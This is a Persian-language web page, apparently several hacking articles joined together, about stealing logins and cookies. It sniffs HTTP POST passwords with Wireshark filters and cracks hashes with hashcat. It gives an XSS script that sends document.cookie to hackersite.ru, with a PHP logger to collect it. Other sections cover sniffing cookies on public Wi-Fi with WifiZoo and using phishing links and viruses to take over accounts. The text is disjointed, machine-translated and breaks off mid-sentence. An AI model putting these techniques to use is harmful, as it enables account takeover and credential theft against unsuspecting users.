بسیاری از کاربران متوجه نیستند که با پر کردن یک نام کاربری و رمز عبور هنگام ثبت نام یا مجوز در یک منبع اینترنتی بسته و فشار دادن ENTER، این داده ها به راحتی قابل رهگیری هستند. اغلب آنها از طریق شبکه به شکل ناامن منتقل می شوند. بنابراین، اگر سایتی که قصد ورود به آن را دارید از پروتکل HTTP استفاده می کند، پس گرفتن این ترافیک و تجزیه و تحلیل آن با استفاده از آن بسیار آسان است. با استفاده از Wiresharkو سپس با استفاده از فیلترها و برنامه های خاص رمز عبور را پیدا و رمزگشایی کنید.

بهترین مکان برای رهگیری رمزهای عبور، هسته شبکه است، جایی که ترافیک همه کاربران هنگام ثبت نام در منابع خارجی به منابع بسته (مثلاً پست) یا جلوی روتر برای دسترسی به اینترنت می رود. ما یک آینه راه اندازی کردیم و آماده ایم که احساس کنیم یک هکر هستیم.

مرحله 1. Wireshark را نصب و راه اندازی کنید تا ترافیک را ضبط کنید

گاهی اوقات برای انجام این کار کافی است فقط رابطی را که قصد داریم ترافیک را از طریق آن ضبط کنیم انتخاب کرده و دکمه Start را کلیک کنید. در مورد ما، ما از طریق یک شبکه بی سیم عکس می گیریم.

ضبط ترافیک آغاز شده است.

مرحله 2. فیلتر کردن ترافیک POST ضبط شده

مرورگر را باز می کنیم و سعی می کنیم با استفاده از نام کاربری و رمز عبور وارد برخی منابع شویم. پس از تکمیل فرآیند مجوز و باز شدن سایت، ما گرفتن ترافیک در Wireshark را متوقف می کنیم. سپس، تحلیلگر پروتکل را باز کنید و تعداد زیادی بسته را مشاهده کنید. اینجاست که بیشتر متخصصان فناوری اطلاعات از این کار منصرف می‌شوند زیرا نمی‌دانند در مرحله بعد چه کاری انجام دهند. اما ما می دانیم و علاقه مند به بسته های خاصی هستیم که حاوی داده های POST، که در دستگاه محلی ما هنگام پر کردن یک فرم روی صفحه تولید و ارسال می شوند سرور راه دورهنگامی که روی دکمه "ورود" یا "مجوز" در مرورگر کلیک می کنید.

یک فیلتر ویژه در پنجره وارد می کنیم تا بسته های ضبط شده را نمایش دهد: http.درخواست.روش ==”پست"

و می بینیم که به جای هزاران بسته، فقط یک بسته با داده هایی که به دنبال آن هستیم.

مرحله 3. ورود به سیستم و رمز عبور کاربر را پیدا کنید

به سرعت کلیک راست کرده و مورد را از منو انتخاب کنید TCP Steam را دنبال کنید

پس از این، متنی در پنجره جدیدی ظاهر می شود که محتوای صفحه را به صورت کد بازیابی می کند. بیایید فیلدهای "رمز عبور" و "کاربر" را پیدا کنیم که مربوط به رمز عبور و نام کاربری است. در برخی موارد، هر دو فیلد به راحتی قابل خواندن هستند و حتی رمزگذاری نمی شوند، اما اگر در هنگام دسترسی به منابع بسیار شناخته شده مانند Mail.ru، Facebook، VKontakte و غیره سعی در جذب ترافیک داشته باشیم، رمز عبور رمزگذاری می شود:

HTTP/1.1 302 پیدا شد

سرور: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Set-Cookie: password= ; انقضا=پنجشنبه، 07-نوامبر-2024 23:52:21 GMT; مسیر=/

مکان: loggedin.php

طول محتوا: 0

اتصال: بستن

نوع محتوا: text/html; charset=UTF-8

بنابراین، در مورد ما:

نام کاربری: networkguru

کلمه عبور:

مرحله 4. نوع رمزگذاری را برای رمزگشایی رمز عبور تعیین کنید

برای مثال به وب سایت http://www.onlinehashcrack.com/hash-identification.php#res بروید و رمز عبور خود را در پنجره شناسایی وارد کنید. لیستی از پروتکل های رمزگذاری به ترتیب اولویت به من داده شد:

مرحله 5. رمزگشایی رمز عبور کاربر

بر در این مرحلهما می توانیم از ابزار hashcat استفاده کنیم:

~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

در خروجی یک رمز عبور رمزگشایی شده دریافت کردیم: simplepassword

بنابراین، با کمک Wireshark، ما نه تنها می‌توانیم مشکلات عملکرد برنامه‌ها و خدمات را حل کنیم، بلکه می‌توانیم خود را به عنوان یک هکر و رهگیری رمزهایی که کاربران در فرم‌های وب وارد می‌کنند، امتحان کنیم. همچنین می‌توانید با استفاده از فیلترهای ساده برای نمایش گذرواژه‌های صندوق پستی کاربران را پیدا کنید:

• پروتکل و فیلتر POP به این صورت است: pop.request.command == "USER" || pop.request.command == "گذر"
• پروتکل و فیلتر IMAP به صورت زیر خواهد بود: imap.request حاوی "ورود" است
• پروتکل SMTP است و باید فیلتر زیر را وارد کنید: smtp.req.command == "AUTH"

و ابزارهای جدی تر برای رمزگشایی پروتکل رمزگذاری.

مرحله 6: اگر ترافیک رمزگذاری شده باشد و از HTTPS استفاده کند چه؟

چندین گزینه برای پاسخ به این سوال وجود دارد.

گزینه 1. هنگامی که اتصال بین کاربر و سرور قطع شد وصل شوید و ترافیک را در لحظه برقراری ارتباط بگیرید (SSL Handshake). هنگامی که یک اتصال برقرار می شود، کلید جلسه می تواند رهگیری شود.

گزینه 2: می‌توانید ترافیک HTTPS را با استفاده از فایل گزارش کلید جلسه ضبط شده توسط فایرفاکس یا کروم رمزگشایی کنید. برای انجام این کار، مرورگر باید طوری پیکربندی شود که این کلیدهای رمزگذاری را در یک فایل لاگ بنویسد (مثال مبتنی بر فایرفاکس) و شما باید آن فایل لاگ را دریافت کنید. در اصل، شما باید فایل کلید جلسه را از آن بدزدید هارد دیسککاربر دیگری (که غیرقانونی است). خوب، سپس ترافیک را ضبط کنید و از کلید حاصل برای رمزگشایی آن استفاده کنید.

شفاف سازی.ما در مورد مرورگر وب شخصی صحبت می کنیم که می خواهند رمز عبور او را بدزدند. اگر منظور ما رمزگشایی ترافیک HTTPS خودمان است و می‌خواهیم تمرین کنیم، این استراتژی جواب می‌دهد. اگر می‌خواهید ترافیک HTTPS سایر کاربران را بدون دسترسی به رایانه‌هایشان رمزگشایی کنید، این کار نمی‌کند - این هم رمزگذاری و هم حریم خصوصی است.

پس از دریافت کلیدها مطابق با گزینه 1 یا 2، باید آنها را در WireShark ثبت کنید:

1. به منوی Edit - Preferences - Protocols - SSL بروید.
2. پرچم "مجموعه مجدد رکوردهای SSL که چندین بخش TCP را در بر می گیرند" را تنظیم کنید.
3. "لیست کلیدهای RSA" و روی ویرایش کلیک کنید.
4. داده ها را در تمام فیلدها وارد کنید و با کلید مسیر را در فایل بنویسید

«یک گوشی هوشمند با ابزار هک؟ چنین چیزی وجود ندارد،» همین اواخر به شما می گفتیم. راه اندازی برخی از ابزارهای معمول برای اجرای حملات فقط بر روی برخی از Maemo امکان پذیر بود. اکنون بسیاری از ابزارهای آشنا به iOS و اندروید منتقل شده اند و برخی ابزارهای هک نیز به طور ویژه برای محیط موبایل نوشته شده اند. آیا گوشی هوشمند می تواند جایگزین لپ تاپ در تست نفوذ شود؟ تصمیم گرفتیم آن را بررسی کنیم.

اندروید

مدیر بسته

اسکنرهای شبکه

دستکاری ترافیک

تونل سازی ترافیک

شبکه بی سیم

ممیزی اپلیکیشن وب

آب و برق های مختلف

دسترسی از راه دور

iOS

کار با سیستم

شنود داده ها

تجزیه و تحلیل شبکه های بی سیم

اسکنرهای شبکه

کنترل از راه دور

بازیابی رمز عبور

بهره برداری از آسیب پذیری ها

کوکی چیست؟

مکانیزمی وجود دارد که به سرور http اجازه می دهد تا برخی از اطلاعات متنی را در رایانه کاربر ذخیره کند و سپس به آن دسترسی پیدا کند. این اطلاعاتبه نام کوکی در اصل، هر کوکی یک جفت است: نام یک پارامتر و مقدار آن. به هر کوکی دامنه ای که به آن تعلق دارد نیز اختصاص داده می شود. به دلایل امنیتی، در تمام مرورگرها سرور http فقط اجازه دسترسی به کوکی دامنه خود را دارد. علاوه بر این، کوکی‌ها ممکن است تاریخ انقضا داشته باشند، در این صورت حتی اگر تمام پنجره‌های مرورگر را ببندید، تا این تاریخ در رایانه ذخیره می‌شوند.

همه سیستم های چند کاربره از کوکی ها برای شناسایی کاربر استفاده می کنند. به طور دقیق تر، اتصال فعلی کاربر به سرویس، جلسه کاربر. اگر شخصی کوکی های شما را بشناسد، می تواند از طرف شما وارد سیستم شود. زیرا در در حال حاضرتعداد بسیار کمی از منابع اینترنتی تغییرات آدرس IP را در طول یک جلسه کاربر بررسی می کنند.

توسعه دهندگان مرورگر ابزارهای داخلی را برای ویرایش کوکی ها ارائه نمی کنند. اما می توانید با یک دفترچه یادداشت معمولی از پس آن بربیایید.

ویرایشگر رجیستری ویندوز نسخه 5.00



@="C:\\IE_ext.htm"

آن را با نام IE_ext.reg ذخیره کنید

مرحله 2: با استفاده از فایل ایجاد شده، تغییرات را به رجیستری ویندوز اضافه کنید.

مرحله 3: یک فایل متنی با متن ایجاد کنید

< script language="javascript">
external.menuArguments.clipboardData.setData("متن"، external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
هشدار (external.menuArguments.document.cookie);

مرحله 4: به وب سایت مورد علاقه خود می رویم.

مرحله 5: روی فضای خالی صفحه کلیک راست کرده و آیتم منو را انتخاب کنید "کار با کوکی ها". اجازه دسترسی به کلیپ بورد. کوکی های شما از این سایت به کلیپ بورد می روند. می توانید دفترچه یادداشت آنها را وارد کنید و نگاهی بیندازید.

مرحله 6: برای تغییر برخی از کوکی ها، فایل C:\IE_ext.htm را ویرایش کنید و جایگزین کنید. نام آزمونبه نام کوکی، ارزش آزمایشی- در معنای آن، testdomain.ru– به دامنه سایت. در صورت لزوم، خطوط مشابه بیشتری اضافه کنید. برای سهولت کنترل، خروجی کوکی‌های فعلی را قبل و بعد از تغییر به اسکریپت اضافه کردم: هشدار (external.menuArguments.document.cookie);

مرحله 7: مرحله 5 را دوباره انجام دهید و سپس صفحه را بازخوانی کنید.

خط پایین: ما با کوکی های به روز شده به این منبع اینترنتی دسترسی خواهیم داشت.

چگونه با استفاده از جاوا اسکریپت کوکی ها را بدزدیم؟

اگر مهاجمی بتواند فرصتی برای اجرای یک اسکریپت جاوا اسکریپت دلخواه در رایانه قربانی پیدا کند، آنگاه می‌تواند کوکی‌های فعلی را به راحتی بخواند. مثال:

var str= document.cookie;

اما آیا او می تواند آنها را به سایت خود منتقل کند، زیرا همانطور که قبلاً اشاره کردم، یک اسکریپت جاوا اسکریپت نمی تواند بدون تأیید اضافی به سایتی که در دامنه دیگری قرار دارد دسترسی پیدا کند؟ به نظر می رسد که یک اسکریپت جاوا اسکریپت می تواند هر تصویری را که در هر سرور http قرار دارد بارگیری کند. در عین حال هرگونه اطلاعات متنی در درخواست دانلود را به این تصویر منتقل کنید. مثال: http://hackersite.ru/xss.jpg?text_infoبنابراین اگر این کد را اجرا کنید:

var img= عکس جدید()؛

img.src= "http://hackersite.ru/xss.jpg؟"+ encodeURI (document.cookie)؛

چگونه می توان با چنین درخواست هایی برای دانلود یک "تصویر" برخورد کرد؟

یک مهاجم فقط باید میزبانی با پشتیبانی PHP پیدا کند و کدهایی مانند این را در آنجا قرار دهد:

$uid=urldcode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt"،"a");
fputs($fp,"$uid\n");
fclose($fp);
?>

سپس تمام پارامترهای درخواست برای این اسکریپت در فایل ذخیره می شود log.txt. تنها چیزی که باقی می ماند جایگزینی اسکریپت جاوا اسکریپت توصیف شده قبلی است http://hackersite.ru/xss.jpgبه مسیر این اسکریپت php.

من فقط ساده ترین راه را برای سوء استفاده از آسیب پذیری های XSS نشان دادم. اما این ثابت می‌کند که وجود حداقل یکی از این آسیب‌پذیری‌ها در یک سایت اینترنتی چند کاربره می‌تواند به مهاجم اجازه دهد از منابع آن از طرف شما استفاده کند.

سلام، این مقاله کوتاه، نه حتی یکنواخت توضیح کوتاهدوست دارم خودم را وقف کنم راه سادهرهگیری کوکی ها در شبکه های وای فای. اگر شخصی علاقه مند به رهگیری "کالاهای پخته شده" باشد، در اینجا به شما نمی گویم کوکی ها چیست و چرا به آنها نیاز است. در یک شبکه بی سیم، من فکر می کنم او باید بداند که چیست و چرا به آن نیاز دارد. من فقط یک چیز را می گویم: با استفاده از این فایل ها می توانید به حساب های افراد دیگر در سایت های مختلف دسترسی پیدا کنید که کاربران را ملزم به انجام فرآیند احراز هویت می کند (به عنوان مثال، mail.ru، vkontakte.ru و غیره).

پس بیایید شروع کنیم. ابتدا باید خود شبکه بی سیم را با یک دروازه دسترسی باز به اینترنت پیدا کنیم و مطلوب است که این شبکه کلاینت های بسیار زیادی داشته باشد. به عنوان مثال، هر شبکه ای در مراکز خرید بزرگ، فرودگاه ها، کافی شاپ های مختلف مناسب است؛ در چنین مکان هایی معمولا مردم استفاده می کنند. دسترسی به وای فایدر اینترنت، برای خواندن نامه، چک کردن حساب ها در سایت های دوستیابی مختلف، مشاهده LJ و انجمن های مختلف. این دقیقاً همان چیزی است که ما نیاز داریم. پس از تصمیم گیری در مورد انتخاب مکان شبکه، با مطالعه ساعات مشخصی از حداکثر تعداد مشتریان، اجازه دهید مستقیماً به عملیات رزمی برویم. برای این ما به یک لپ تاپ نیاز داریم آداپتور وای فای، و مجموعه خاصی از برنامه ها. در مورد من استفاده کردم لپ تاپ ایسر Aspire 3610، کارت وای فای مشتری D-Link DWL G650 و سیستم عامل BackTrack3 نصب شده است.

من به شما توصیه می کنم از این سیستم عامل استفاده کنید، زیرا از قبل شامل کل مجموعه برنامه هایی است که ممکن است به آن نیاز داشته باشید، و مهمترین مزیت این است که شما مجبور نیستید Backtrack را بر روی خود نصب کنید. HDD، می توانید این سیستم عامل را مستقیماً از یک سی دی یا فلش درایو بوت کنید.

حال به سراغ نرم افزارهای لازم می رویم. من از kismet برای کشف شبکه و WifiZoo برای رهگیری کوکی ها استفاده کردم. من به طور مفصل در مورد برنامه دوم صحبت خواهم کرد. WifiZoo یک اسکنر امواج هوایی غیرفعال است و مقدار زیادی را جمع آوری می کند اطلاعات مفیدمانند: pop3، ترافیک smtp، http cookies/authinfo، msn، اعتبارنامه ftp، ترافیک شبکه telnet، nbt و غیره. تنها ایراد این برنامه عدم وجود حالت پخش کانال است، WifiZoo به سادگی به رابط بی سیم گوش می دهد و به اصطلاح نمی تواند از کانالی به کانال دیگر بپرد. اما این عیب با برنامه دیگری به نام Kismet که از این حالت پشتیبانی می کند جبران می شود. برای راه اندازی WifiZoo شما نیاز دارید:

• پایتون
• پوسته پوسته شدن
• کیسمت

پس بیایید برنامه را راه اندازی کنیم، ابتدا Kismet را برای پشتیبانی از حالت پرش کانال راه اندازی می کنیم، سپس WifiZoo را مستقیماً راه اندازی می کنیم، پنجره زیر باید در مقابل شما ظاهر شود:

اکنون تنها چیزی که باقی می‌ماند این است که بنشینید و منتظر بمانید تا چیزی را رهگیری کنید؛ هر چیزی که برنامه رهگیری می‌کند را می‌توان در لاگ‌هایی که در دایرکتوری با برنامه /logs/ قرار دارند، پیدا کرد. همچنین می توانید یک رابط رابط کاربری گرافیکی راه اندازی کنید که به طور خودکار به http در 127.0.0.1:8000 متصل می شود.

من در مورد تمام ویژگی های این برنامه فوق العاده نمی نویسم، فکر می کنم سایر ویژگی ها را خودتان متوجه خواهید شد و از آنجایی که در حال حاضر ما فقط به کوکی ها علاقه مند هستیم. روی پیوندی که می گوید کوکی ها کلیک کنید و ببینید چه چیزی را رهگیری کردیم:

راه های سرقت کوکی ها

این روش هک، سرقت کوکی ها، عالی عمل می کند و توسط بسیاری از هکرها استفاده می شود. اگر شما نیز می خواهید آن را امتحان کنید، اما نمی دانید چه کاری انجام دهید، توصیه های ما را بخوانید.

کوکی ها چیست؟

این اطلاعات مربوط به بازدید کاربر از یک سایت خاص است. در جای جداگانه ذخیره می شود سند متنی. در آنجا می توانید اطلاعات مختلفی پیدا کنید. از جمله ورود، رمز عبور، آدرس صندوق های پستیو شماره تلفن به همین دلیل است که سارقان تلاش می کنند تا به این اسناد دست یابند. هکرها برای سرقت مواد مورد نیاز خود به روش های مختلفی متوسل می شوند.

راه های سرقت کوکی ها

آسیب پذیری XSS

می توان آن را در هر وب سایتی یافت و استفاده کرد. وقتی یک متخصص آسیب پذیری را پیدا می کند، کد خاصی را به آن تزریق می کند. بسته به هدف، کدها متفاوت هستند؛ آنها برای یک منبع خاص نوشته می شوند. هنگامی که کاربر از این صفحه بازدید می کند و آن را به روز می کند، همه تغییرات اعمال می شود. کد شروع به عمل می کند - در رایانه قربانی تعبیه شده و همه را جمع آوری می کند اطلاعات لازماز مرورگر

برای معرفی کد، می توانید از هر نوع آسیب پذیری استفاده کنید - خطا در یک منبع وب، در یک مرورگر یا در یک سیستم کامپیوتری.

2 نوع حمله XSS وجود دارد:

منفعل - به اسکریپت صفحه هدایت می شود. در این مورد، باید به دنبال آسیب پذیری در عناصر صفحه باشید. به عنوان مثال، یک برگه گفتگو، یک کادر جستجو، یک کاتالوگ ویدئو و غیره.

فعال - شما باید آنها را در سرور جستجو کنید. آنها به ویژه در انجمن ها، وبلاگ ها و چت های مختلف فراوان هستند.

چگونه یک فرد را مجبور به اعمال XSS کنیم؟

این کار آسان نیست، زیرا اغلب برای فعال کردن کد باید روی پیوند با آن کلیک کنید. می توانید پیوند را پنهان کنید و آن را در یک ایمیل همراه با یک پیشنهاد جالب ارسال کنید. به عنوان مثال، یک تخفیف بزرگ در یک فروشگاه آنلاین ارائه دهید. شما همچنین می توانید همه اینها را در تصویر پیاده سازی کنید. کاربر به احتمال زیاد آن را مشاهده خواهد کرد و به چیزی مشکوک نخواهد شد.

نصب اسنیفر

این یک پیاده سازی است برنامه های تخصصیبرای نظارت بر ترافیک در دستگاه شخص دیگری. sniffer به شما امکان می دهد جلسات ارسال شده را با داده های افراد دیگر رهگیری کنید. به این ترتیب می‌توانید همه لاگین‌ها و رمزهای عبور، آدرس‌ها، هر کدام را دریافت کنید اطلاعات مهمتوسط کاربر از طریق شبکه منتقل می شود. در این مورد، حملات اغلب بر روی داده های HTTP محافظت نشده انجام می شود. وای فای ناامن برای این کار خوب عمل می کند.

چندین روش برای پیاده سازی sniffer وجود دارد:

• کپی ترافیک؛
• تجزیه و تحلیل داده ها با استفاده از حملات ترافیکی؛
• گوش دادن به رابط ها؛
• معرفی یک sniffer به یک کانال شکستن.

سرقت کوکی ها با استفاده از ویروس

کارشناسان توصیه می کنند که از کوکی ها استفاده نکنید مگر اینکه نیاز خاصی به آن وجود داشته باشد. اگر امکان غیرفعال کردن آنها وجود دارد، بهتر است این کار را انجام دهید. این به این دلیل است که کوکی ها بسیار آسیب پذیر هستند. آنها اغلب توسط مجرمان سرقت می شوند. حجم عظیمی از اطلاعات شخصی را می توان از این فایل ها به دست آورد. اطلاعات محرمانه، که علیه شخص مورد استفاده قرار خواهد گرفت. خطرناک ترین نوع فایل ها آنهایی هستند که پس از پایان جلسه در سیستم باقی می مانند.

کوکی ها اغلب با استفاده از یک ابزار ویروسی به سرقت می روند. این کار به سادگی انجام می شود. هر ابزار ایمن با ویروسی تعبیه شده است که مواد خاصی را روی رایانه جمع آوری می کند. برنامه ویروس به سرور صاحب خود متصل خواهد شد. برنامه باید طوری پیکربندی شود که مرورگر از آن به عنوان سرور پروکسی استفاده کند.

هنگامی که برنامه به رایانه شخصی قربانی می رسد، به طور خودکار شروع به جمع آوری تمام داده های ذخیره شده و ارسال آن به شما می کند.

ویروس ها متفاوت هستند، عملکرد آنها نیز ممکن است متفاوت باشد. برخی به شما این امکان را می دهند که به طور کامل مرورگر را کنترل کنید و هرگونه اطلاعات را مشاهده کنید. دیگران قادر به سرقت مواد محافظت شده هستند. برخی دیگر فقط داده های ناامن را جمع آوری می کنند.

ممکن است برای معرفی یک برنامه ویروس به رایانه شخص دیگری مشکل داشته باشید. لازم است کاربر را مجبور به دانلود و اجرای آن کنید. در اینجا می توانید نامه ای به همراه لینک برنامه برای او بفرستید یا برنامه را به عنوان امن منتقل کنید و منتظر بمانید تا شخص آن را از وب سایت شما دانلود کند.

چگونه از کوکی ها در برابر سرقت محافظت کنیم؟

بیشتر منابع وب به اندازه کافی محافظت نمی شوند. هکرها به راحتی آسیب پذیری ها و باگ ها را در این پلتفرم ها پیدا می کنند.

قوانین حفاظت از کوکی:

1. شناسه رایانه را به جلسه فعلی پیوند دهید. سپس، هنگامی که از یک دستگاه شخص ثالث وارد سایت می شوید، یک جلسه جدید شروع می شود و داده های مربوط به جلسه قبلی بازیابی نمی شود.
2. جلسه را به مرورگر پیوند دهید. همان اصل مانند پاراگراف قبل عمل خواهد کرد.
3. رمزگذاری پارامترهای ارسال شده از طریق شبکه سپس اطلاعات ذخیره شده در سند قابل درک نخواهد بود. برای کسی که رهگیری کرده بی فایده خواهد بود. این تکنیک 100٪ از شما محافظت نمی کند؛ برخی از متخصصان می توانند هر ماده ای را رمزگشایی کنند.
4. یک پوشه جداگانه برای شناسه ها ایجاد کنید.

چگونه از طریق کوکی ها رمز اکانت شخص دیگری را پیدا کنیم؟

برای به دست آوردن اطلاعات ورود به سیستم شخص دیگری، ابتدا باید به فایلی که در آن ذخیره شده است بروید.

برای کسانی که استفاده می کنند موزیلا فایرفاکسباید به تب tools بروید که در منوی اصلی قرار دارد. بعد در تنظیمات سیستم، بخش "محافظت" را پیدا خواهید کرد، جایی که باید تمام اطلاعات مهم در مورد حساب ها را در شبکه های اجتماعی جستجو کنید. همه رمزهای عبور پنهان هستند، بنابراین روی دکمه "نمایش" کلیک کنید. شما می توانید بلافاصله محافظت را نصب کنید و یک کد ویژه قرار دهید. سپس هیچکس جز شما این اطلاعات را دریافت نخواهد کرد.

در Opera فقط نام های کاربری برای مشاهده عمومی در دسترس هستند. اما در منو می توانید یک مدیر رمز عبور پیدا کنید و همه چیز ذخیره شده در رایانه خود را مشاهده کنید. لیست کاملدر مدیر است. برای دسترسی به رمزهای عبور، باید افزونه دیگری را نصب کنید.

که در گوگل کرومهمه این مواد را می توان در تنظیمات پیشرفته مشاهده کرد. یک برگه با تمام کوکی های ذخیره شده وجود دارد.

متاسفانه، مرورگر استاندارد اینترنت اکسپلوررچنین عملکردهایی ندارد. برای کسب اطلاعات در مورد پلتفرم های وب که صاحب رایانه از آنها بازدید می کند، باید یک برنامه ویژه را دانلود کنید. شما می توانید آن را به صورت رایگان در اینترنت پیدا کنید، کاملا امن است، اما بهتر است آن را از منابع معتبر دانلود کنید. فراموش نکنید که هر برنامه ای باید توسط آنتی ویروس اسکن شود. این به ویژه برای آن دسته از ابزارهایی که با رمزهای عبور کار می کنند صادق است.

این تکنیک فقط برای کسانی مناسب است که دارند دسترسی فیزیکیبه کامپیوتر قربانی همچنین اگر شخص از طریق رایانه شخصی شما وارد پلتفرم شده باشد و داده های خود را ذخیره کرده باشد، می توانید رمز عبور شخص دیگری را نیز پیدا کنید.

برنامه هایی برای سرقت کوکی ها

انجمن های هکرهای زیادی در اینترنت وجود دارد که در آن هکرها با یکدیگر ارتباط برقرار می کنند. مردم به امید دریافت کمک رایگان به آنجا می روند. آنجاست که می توانید تعداد زیادی برنامه مختلف برای هک پیدا کنید. ما می خواهیم به شما هشدار دهیم که نباید به این برنامه ها اعتماد کنید. ابزارهای کمکی برای سرقت کوکی ها از راه دور از دستگاه شخص دیگری، برنامه های ساختگی یا ویروسی هستند. اگر این نرم افزار را بر روی کامپیوتر خود دانلود کنید، به احتمال زیاد در دام یک کلاهبردار قرار خواهید گرفت. کلاهبرداران برنامه ها را به صورت رایگان ارسال می کنند. بنابراین، آنها نرم افزار ویروس را توزیع می کنند و کنترل رایانه های شخصی دیگران را به دست می آورند. به طور کلی، چنین برنامه هایی کلاهبرداری هستند، این را با رابط کاربری و محتوای آنها متوجه خواهید شد. اگر قصد دارید از هر نرم افزاری برای استخراج فایل ها استفاده کنید، بگذارید sniffers باشد. البته استفاده از آنها چندان آسان نیست. و پیدا کردن یک اسنیفر خوب در اینترنت کار آسانی نیست. اما چنین نرم افزاری در دسترس متخصصانی است که می توانند آن را با پول به شما بفروشند. به یاد داشته باشید که کلاهبرداران زیادی وجود دارند که هر کدام ترفندهای خاص خود را دارند. شما فقط باید به هکرهای قابل اعتمادی اعتماد کنید که شهرت خوبی دارند، نظرات خود را دارند و وب سایت خود را دارند.

در خاتمه، می خواهم توجه داشته باشم که سرقت کوکی ها یک روش واقعا قدرتمند است که اثربخشی آن بسیار بالا است. اگر می خواهید پروفایل شخصی را در یک شبکه اجتماعی یا پیام رسان فوری هک کنید، حتما این گزینه را در نظر بگیرید. این روش زمانی بهترین کار را دارد که بتوانید از رایانه قربانی استفاده کنید. به دست آوردن مواد از راه دور بسیار دشوارتر است، اما می توانید از نکات ما استفاده کنید و سعی کنید این روش را عملی کنید.

در فصل